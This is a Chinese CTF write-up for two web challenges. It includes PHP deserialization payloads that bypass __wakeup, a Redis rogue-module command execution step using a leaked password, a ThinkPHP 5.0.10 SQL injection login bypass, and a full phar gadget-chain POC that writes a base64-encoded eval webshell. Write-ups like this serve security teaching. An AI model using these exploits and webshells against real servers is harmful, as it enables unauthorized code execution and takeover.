CTF- 天翼杯 witeup

esay_eval

<?php   
class A{   
    public $code = "";   
    function __call($method,$args){   
        eval($this->code);   

    }   
    function __wakeup(){   
        $this->code = "";   
    }   
}   

class B{   
    function __destruct(){   
        echo $this->a->a();   
    }   
}   
if(isset($_REQUEST['poc'])){   
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);   
    if (isset($ret[1])) {   
        foreach ($ret[1] as $i) {   
            if(intval($i)!==1){   
                exit("you want to bypass wakeup ? no !");   
            }   
        }   
        unserialize($_REQUEST['poc']);       
    }   


}else{   
    highlight_file(__FILE__);   
}

方法一：类名小写绕过

?poc=O:1:"B":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:18:"eval($_POST[jan]);";}}

方法二：小trick，省略末尾的右大括号，call提到wakeup前绕过：

O:1:"B":1:{s:1:"a";O:1:"A":1:{s:4:"code";s:10:"phpinfo();";}

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,passthru,pcntl_alarm,pcntl_waitpid,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv,putenv,mail,debug_backtrace,debug_print_backtrace,gc_collect_cycles,array_merge_recursive,curl_init,curl_exec

vim -r config.php

<?php

define("DB_HOST","localhost");
define("DB_USERNAME","root");
define("DB_PASSWOrd","");
define("DB_DATABASE","test");

define("REDIS_PASS","you_cannot_guess_it");

var_dump(scandir('/tmp'));

2 => string 'apache2-stderr---supervisor-myt7y2t0.log' (length=40)
  3 => string 'apache2-stdout---supervisor-h8oixen6.log' (length=40)
  4 => string 'redis-stderr---supervisor-qr2zr3_q.log' (length=38)
  5 => string 'redis-stdout---supervisor-3bk1_ov6.log' (length=38)
  6 => string 'tmpzr8_9mjt' (length=11)

redis中getshell：https://github.com/vulhub/redis-rogue-getshell

发现redis，连接，密码为配置文件中的：you_cannot_guess_it

jan=$host='127.0.0.1';
$fp = fsockopen("$host", 6379, $errno, $errstr, 30);
$out = "AUTH you_cannot_guess_itrn";
$out .="module load /tmp/exp.sorn";
$out .="system.exec 'whoami'rn";
$out .= "QUITrn";
fwrite($fp, $out);
while (!feof($fp)) {
    echo fgets($fp, 128);
}
fclose($fp);

或者用蚁剑进行连接

ez_TP

ThinkPHP V5.0.10

www.zip源码泄露

application/index/controller/Index.php：

<?php
namespace appindexcontroller;



class Index extends thinkController
{
   public function index($username=null,$password=null)
   {
       if(!(thinkSession::get('user'))){
           thinkSession::set('user', 'guest');
       }
       //$file=request()->file('Files');
       if (!$username||!$password){
           return $this->fetch();
       }
       else{
           $result = db('ctf_user')->where(['username' => $username])->select();
           if($result){
               if($password===$result[0]['password']){
                   thinkSession::set('user', 'admin');
                   return 'success';
               }
               else{
                   return'账号或密码错误';
               }

           }
           else{
               return'账号或密码错误';
           }
       }

       //return '<style type="text/css">*{ padding: 0; margin: 0; } .think_default_text{ padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none} a:hover{text-decoration:underline; } body{ background: #fff; font-family: "Century Gothic","Microsoft yahei"; color: #333;font-size:18px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.6em; font-size: 42px }</style><div style="padding: 24px 48px;"> <h1>:)</h1><p> ThinkPHP V5<br/><span style="font-size:30px">十年磨一剑 - 为API开发设计的高性能框架</span></p><span style="font-size:22px;">[ V5.0 版本由 <a href="http://www.qiniu.com" target="qiniu">七牛云</a> 独家赞助发布 ]</span></div><script type="text/javascript" src="http://tajs.qq.com/stats?sId=9347272" charset="UTF-8"></script><script type="text/javascript" src="http://ad.topthink.com/Public/static/client.js"></script><thinkad id="ad_bd568ce7058a1091"></thinkad>';
   }
}

参考链接：https://mochazz.github.io/2019/03/23/ThinkPHP5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8BSQL%E6%B3%A8%E5%85%A54/

联合查询，成功登入admin

/public/index.php?username[0]=not%20like&username[1][0]=%%&username[1][1]=233&username[2]=)%20union select 1,1%23&password=1

application/admin/controller/Index.php：

<?php
namespace appadmincontroller;


use thinkRequest;

class Index extends thinkController
{
    public function __construct(Request $request = null)
    {
        parent::__construct($request);
       $tmp=thinkSession::get('user');
       if($tmp&&$tmp==='admin'){
            return true;
       }
       else{
           $this->error('无权访问');
       }
    }

    public function index()
    {
        return $this->fetch();
        //return '<style type="text/css">*{ padding: 0; margin: 0; } .think_default_text{ padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none} a:hover{text-decoration:underline; } body{ background: #fff; font-family: "Century Gothic","Microsoft yahei"; color: #333;font-size:18px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.6em; font-size: 42px }</style><div style="padding: 24px 48px;"> <h1>:)</h1><p> ThinkPHP V5<br/><span style="font-size:30px">十年磨一剑 - 为API开发设计的高性能框架</span></p><span style="font-size:22px;">[ V5.0 版本由 <a href="http://www.qiniu.com" target="qiniu">七牛云</a> 独家赞助发布 ]</span></div><script type="text/javascript" src="http://tajs.qq.com/stats?sId=9347272" charset="UTF-8"></script><script type="text/javascript" src="http://ad.topthink.com/Public/static/client.js"></script><thinkad id="ad_bd568ce7058a1091"></thinkad>';
    }
    public function upload(){
        // 获取表单上传文件
        $file = request()->file('files');

        if (empty($file)) {
            $this->error('请选择上传文件');
        }
        // 移动到框架应用根目录/public/uploads/ 目录下
        $file->validate(array('ext'=>['gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf']));
        $info = $file->move('.');
        if ($info) {
            $this->success('文件上传成功');
            echo $info->getFilename();
        } else {
            // 上传失败获取错误信息
            $this->error($file->getError());
        }

    }
    public function logout(){
        thinkSession::clear();
        header('Location: ./');
    }
    public function listpic($dir){
        $res=array();
        if(is_dir($dir)){
            $tmp=scandir($dir);
            foreach ($tmp as $key=>$value){
                if (in_array(pathinfo($value,PATHINFO_EXTENSION) ,['gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf'])){
                    array_push($res,$value);
                }
            }
            return json_encode($res,true);
        }
    }
}

上传phar包，is_dir函数来触发反序列化

poc：这里封了Process类的close方法，通过Window来构造

<?php

namespace thinkprocesspipes;

abstract class Pipes{};

use thinkmodelPivot;

class Windows extends Pipes{
    private $files = [];
    public function __construct()
    {
        $this->files = [new Pivot()];
    }
}
 namespace think;
 class Model{

 }
 namespace thinkmodel;


 use thinkModel;
 class Merge extends Model{
     public $a='1';
     public function __construct()
     {
     }
 }
 use thinkmodelrelationHasMany;
  class Pivot extends Model{
     public $data=[];
     public $relation=[];
     public $append = [];
     public function __construct()
     {
        $this->data['a']=new HasMany();
        $this->append['a']=[];
     }
 }



namespace thinkmodelrelation;
use thinkconsoleOutput;
use thinkdbQuery;
use thinkmodelMerge;
use thinkmodelRelation;
class HasMany extends Relation
{
    //protected $baseQuery=true;
    protected $parent;
    protected $localKey='a';
    protected $foreignKey='a';
    protected $pivot;
    public function __construct(){
        $this->query=new Output();
        $this->parent= new Merge();

    }
}


namespace thinkmodel;
abstract class Relation
{}
namespace thinkdb;
class Query{}


namespace thinkconsole;
class Output{
    protected $styles = [
        'info',
        'error',
        'comment',
        'question',
        'highlight',
        'warning',
        'getTable',
        'where'
    ];
    private $handle;
    public function __construct()
    {
        $this->handle = (new thinksessiondriverMemcache);
    }
}
namespace thinksessiondriver;
class Memcache
{
    protected $handler;
    public function __construct()
    {
        $this->handler = (new thinkcachedriverMemcached);
    }
}


namespace thinkcachedriver;

class Memcached
{
    protected $tag;
    protected $options;
    protected $handler;

    public function __construct()
    {
        $this->tag = true;
        $this->options = [
            'expire'   => 0,
            'prefix'   => 'PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTsgPz4+',
        ];
        $this->handler = (new File);
    }
}

class File
{
    protected $tag;
    protected $options;
    public function __construct()
    {
        $this->tag = false;
        $this->options = [
            'expire'        => 3600,
            'cache_subdir'  => false,
            'prefix'        => '',
            'data_compress' => false,
            'path'          => 'php://filter/convert.base64-decode/resource=/var/www/html/',
        ];
    }
}
$a = new thinkprocesspipesWindows();
echo urlencode(serialize($a));
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'this is a test file');
$phar->setStub('GIF89a __HALT_COMPILER();');
$phar->setMetadata($a);
$phar->stopBuffering();

触发反序列化

/public/index.php?s=admin/index/listpic&dir=phar:///var/www/html/public/static/img/person.jpg

成功写马getshell